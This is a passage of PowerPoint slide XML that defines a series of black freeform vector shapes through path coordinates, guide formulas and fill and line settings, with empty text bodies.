                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 96"/>
                <a:gd name="T16" fmla="*/ 0 h 105"/>
                <a:gd name="T17" fmla="*/ 96 w 96"/>
                <a:gd name="T18" fmla="*/ 105 h 105"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="96" h="105">
                  <a:moveTo>
                    <a:pt x="0" y="72"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="64" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96" y="35"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="31" y="105"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="72"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FF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03" name="Freeform 1045">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40F6F90F-0E0B-471B-9ADC-013E0251D95D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3631" y="2352"/>
              <a:ext cx="39" cy="44"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 78"/>
                <a:gd name="T1" fmla="*/ 1 h 88"/>
                <a:gd name="T2" fmla="*/ 1 w 78"/>
                <a:gd name="T3" fmla="*/ 1 h 88"/>
                <a:gd name="T4" fmla="*/ 1 w 78"/>
                <a:gd name="T5" fmla="*/ 0 h 88"/>
                <a:gd name="T6" fmla="*/ 1 w 78"/>
                <a:gd name="T7" fmla="*/ 1 h 88"/>
                <a:gd name="T8" fmla="*/ 0 w 78"/>
                <a:gd name="T9" fmla="*/ 1 h 88"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 78"/>
                <a:gd name="T16" fmla="*/ 0 h 88"/>
                <a:gd name="T17" fmla="*/ 78 w 78"/>
                <a:gd name="T18" fmla="*/ 88 h 88"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="78" h="88">
                  <a:moveTo>
                    <a:pt x="0" y="88"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2" y="70"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="67" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="88"/>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04" name="Freeform 1046">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8C225F8-1780-4A05-9DA5-06B7723FC24E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3649" y="2334"/>
              <a:ext cx="21" cy="20"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 43"/>
                <a:gd name="T1" fmla="*/ 0 h 39"/>
                <a:gd name="T2" fmla="*/ 0 w 43"/>
                <a:gd name="T3" fmla="*/ 1 h 39"/>
                <a:gd name="T4" fmla="*/ 0 w 43"/>
                <a:gd name="T5" fmla="*/ 1 h 39"/>
                <a:gd name="T6" fmla="*/ 0 w 43"/>
                <a:gd name="T7" fmla="*/ 1 h 39"/>
                <a:gd name="T8" fmla="*/ 0 w 43"/>
                <a:gd name="T9" fmla="*/ 0 h 39"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 43"/>
                <a:gd name="T16" fmla="*/ 0 h 39"/>
                <a:gd name="T17" fmla="*/ 43 w 43"/>
                <a:gd name="T18" fmla="*/ 39 h 39"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="43" h="39">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7" y="5"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43" y="39"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32" y="3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05" name="Freeform 1047">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03630F5A-D982-4CE2-A8FF-89047438A9BA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3617" y="2289"/>
              <a:ext cx="159" cy="174"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 318"/>
                <a:gd name="T1" fmla="*/ 1 h 346"/>
                <a:gd name="T2" fmla="*/ 1 w 318"/>
                <a:gd name="T3" fmla="*/ 1 h 346"/>
                <a:gd name="T4" fmla="*/ 1 w 318"/>
                <a:gd name="T5" fmla="*/ 1 h 346"/>
                <a:gd name="T6" fmla="*/ 1 w 318"/>
                <a:gd name="T7" fmla="*/ 0 h 346"/>
                <a:gd name="T8" fmla="*/ 0 w 318"/>
                <a:gd name="T9" fmla="*/ 1 h 346"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 318"/>
                <a:gd name="T16" fmla="*/ 0 h 346"/>
                <a:gd name="T17" fmla="*/ 318 w 318"/>
                <a:gd name="T18" fmla="*/ 346 h 346"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="318" h="346">
                  <a:moveTo>
                    <a:pt x="0" y="340"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5" y="346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="318" y="3"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="316" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="340"/>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06" name="Freeform 1048">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BEE6FF5-5797-46C7-93C6-55F9C5BB9FB4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3512" y="2447"/>
              <a:ext cx="78" cy="111"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1 w 156"/>
                <a:gd name="T1" fmla="*/ 1 h 222"/>
                <a:gd name="T2" fmla="*/ 1 w 156"/>
                <a:gd name="T3" fmla="*/ 1 h 222"/>
                <a:gd name="T4" fmla="*/ 1 w 156"/>
                <a:gd name="T5" fmla="*/ 1 h 222"/>
                <a:gd name="T6" fmla="*/ 1 w 156"/>
                <a:gd name="T7" fmla="*/ 1 h 222"/>
                <a:gd name="T8" fmla="*/ 1 w 156"/>
                <a:gd name="T9" fmla="*/ 1 h 222"/>
                <a:gd name="T10" fmla="*/ 0 w 156"/>
                <a:gd name="T11" fmla="*/ 1 h 222"/>
                <a:gd name="T12" fmla="*/ 1 w 156"/>
                <a:gd name="T13" fmla="*/ 0 h 222"/>
                <a:gd name="T14" fmla="*/ 1 w 156"/>
                <a:gd name="T15" fmla="*/ 1 h 222"/>
                <a:gd name="T16" fmla="*/ 1 w 156"/>
                <a:gd name="T17" fmla="*/ 1 h 222"/>
                <a:gd name="T18" fmla="*/ 1 w 156"/>
                <a:gd name="T19" fmla="*/ 1 h 222"/>
                <a:gd name="T20" fmla="*/ 1 w 156"/>
                <a:gd name="T21" fmla="*/ 1 h 222"/>
                <a:gd name="T22" fmla="*/ 1 w 156"/>
                <a:gd name="T23" fmla="*/ 1 h 2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22"/>
                <a:gd name="T38" fmla="*/ 156 w 156"/>
                <a:gd name="T39" fmla="*/ 222 h 2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22">
                  <a:moveTo>
                    <a:pt x="125" y="215"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="150" y="187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127" y="132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83" y="68"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47" y="33"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92" y="67"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="130" y="124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="156" y="185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125" y="222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125" y="215"/>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2907" name="Freeform 1049">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0B6D9CE-7ABF-4E3F-9692-88FA661C720A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3116" y="2595"/>
              <a:ext cx="313" cy="62"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 628"/>
                <a:gd name="T1" fmla="*/ 1 h 123"/>
                <a:gd name="T2" fmla="*/ 0 w 628"/>
                <a:gd name="T3" fmla="*/ 0 h 123"/>
                <a:gd name="T4" fmla="*/ 0 w 628"/>
                <a:gd name="T5" fmla="*/ 1 h 123"/>
                <a:gd name="T6" fmla="*/ 0 w 628"/>
                <a:gd name="T7" fmla="*/ 1 h 123"/>
                <a:gd name="T8" fmla="*/ 0 w 628"/>
                <a:gd name="T9" fmla="*/ 1 h 123"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 628"/>
                <a:gd name="T16" fmla="*/ 0 h 123"/>
                <a:gd name="T17" fmla="*/ 628 w 628"/>
                <a:gd name="T18" fmla="*/ 123 h 123"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="628" h="123">
                  <a:moveTo>
                    <a:pt x="0" y="45"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="143" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="628" y="47"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="547" y="123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="45"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:ln w="11113">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="122908" name="Freeform 1050">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AD40E62-6C5D-4D94-95FC-112FB6879C6A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3388" y="2744"/>
              <a:ext cx="178" cy="219"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 357"/>
                <a:gd name="T1" fmla="*/ 1 h 436"/>
                <a:gd name="T2" fmla="*/ 0 w 357"/>
                <a:gd name="T3" fmla="*/ 1 h 436"/>
                <a:gd name="T4" fmla="*/ 0 w 357"/>
                <a:gd name="T5" fmla="*/ 1 h 436"/>
                <a:gd name="T6" fmla="*/ 0 w 357"/>
                <a:gd name="T7" fmla="*/ 0 h 436"/>
                <a:gd name="T8" fmla="*/ 0 w 357"/>
                <a:gd name="T9" fmla="*/ 1 h 436"/>
                <a:gd name="T10" fmla="*/ 0 w 357"/>
                <a:gd name="T11" fmla="*/ 1 h 436"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 60000 65536"/>
                <a:gd name="T16" fmla="*/ 0 60000 65536"/>
                <a:gd name="T17" fmla="*/ 0 60000 65536"/>
                <a:gd name="T18" fmla="*/ 0 w 357"/>
                <a:gd name="T19" fmla="*/ 0 h 436"/>
                <a:gd name="T20" fmla="*/ 357 w 357"/>
                <a:gd name="T21" fmla="*/ 436 h 436"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T12">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T15">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T16">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
                <a:cxn ang="T17">
                  <a:pos x="T10" y="T11"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T18" t="T19" r="T20" b="T21"/>
              <a:pathLst>
                <a:path w="357" h="436">
                  <a:moveTo>
                    <a:pt x="0" y="296"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="357" y="141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="357" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164" y="59"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="296"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:ln w="11113">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="122909" name="Freeform 1051">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2F548E2-3BC4-46E5-B84F-D41283102180}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2997" y="2850"/>
              <a:ext cx="391" cy="113"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 781"/>
                <a:gd name="T1" fmla="*/ 1 h 225"/>
                <a:gd name="T2" fmla="*/ 0 w 781"/>
                <a:gd name="T3" fmla="*/ 1 h 225"/>
                <a:gd name="T4" fmla="*/ 1 w 781"/>
                <a:gd name="T5" fmla="*/ 1 h 225"/>
                <a:gd name="T6" fmla="*/ 1 w 781"/>
                <a:gd name="T7" fmla="*/ 1 h 225"/>
                <a:gd name="T8" fmla="*/ 1 w 781"/>
                <a:gd name="T9" fmla="*/ 0 h 225"/>
                <a:gd name="T10" fmla="*/ 0 w 781"/>
                <a:gd name="T11" fmla="*/ 1 h 225"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 60000 65536"/>
                <a:gd name="T16" fmla="*/ 0 60000 65536"/>
                <a:gd name="T17" fmla="*/ 0 60000 65536"/>
                <a:gd name="T18" fmla="*/ 0 w 781"/>
                <a:gd name="T19" fmla="*/ 0 h 225"/>
                <a:gd name="T20" fmla="*/ 781 w 781"/>
                <a:gd name="T21" fmla="*/ 225 h 225"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T12">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T15">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T16">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
                <a:cxn ang="T17">
                  <a:pos x="T10" y="T11"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T18" t="T19" r="T20" b="T21"/>
              <a:pathLst>
                <a:path w="781" h="225">
                  <a:moveTo>
                    <a:pt x="0" y="8"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="143"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="781" y="225"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="781" y="71"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="8"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:ln w="11113">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="122910" name="Freeform 1052">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90E4E84B-85CC-470E-BBFC-F9C5C86146C0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2997" y="2705"/>
              <a:ext cx="569" cy="188"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 1138"/>
                <a:gd name="T1" fmla="*/ 1 h 375"/>
                <a:gd name="T2" fmla="*/ 1 w 1138"/>
                <a:gd name="T3" fmla="*/ 0 h 375"/>
                <a:gd name="T4" fmla="*/ 1 w 1138"/>
                <a:gd name="T5" fmla="*/ 1 h 375"/>
                <a:gd name="T6" fmla="*/ 1 w 1138"/>
                <a:gd name="T7" fmla="*/ 1 h 375"/>
                <a:gd name="T8" fmla="*/ 0 w 1138"/>
                <a:gd name="T9" fmla="*/ 1 h 375"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 1138"/>
                <a:gd name="T16" fmla="*/ 0 h 375"/>
                <a:gd name="T17" fmla="*/ 1138 w 1138"/>
                <a:gd name="T18" fmla="*/ 375 h 375"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="1138" h="375">
                  <a:moveTo>
                    <a:pt x="0" y="297"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="356" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1138" y="78"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="781" y="375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="297"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:ln w="11113">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="122911" name="Freeform 1053">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8729221C-00F8-4372-A441-360FBBE4BBAA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3079" y="2638"/>
              <a:ext cx="287" cy="216"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 572"/>
                <a:gd name="T1" fmla="*/ 0 h 431"/>
                <a:gd name="T2" fmla="*/ 0 w 572"/>
                <a:gd name="T3" fmla="*/ 1 h 431"/>
                <a:gd name="T4" fmla="*/ 1 w 572"/>
                <a:gd name="T5" fmla="*/ 1 h 431"/>
                <a:gd name="T6" fmla="*/ 1 w 572"/>
                <a:gd name="T7" fmla="*/ 1 h 431"/>
                <a:gd name="T8" fmla="*/ 0 w 572"/>
                <a:gd name="T9" fmla="*/ 0 h 431"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 572"/>
                <a:gd name="T16" fmla="*/ 0 h 431"/>
                <a:gd name="T17" fmla="*/ 572 w 572"/>
                <a:gd name="T18" fmla="*/ 431 h 431"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="572" h="431">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="373"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="572" y="431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="572" y="59"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:ln w="11113">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
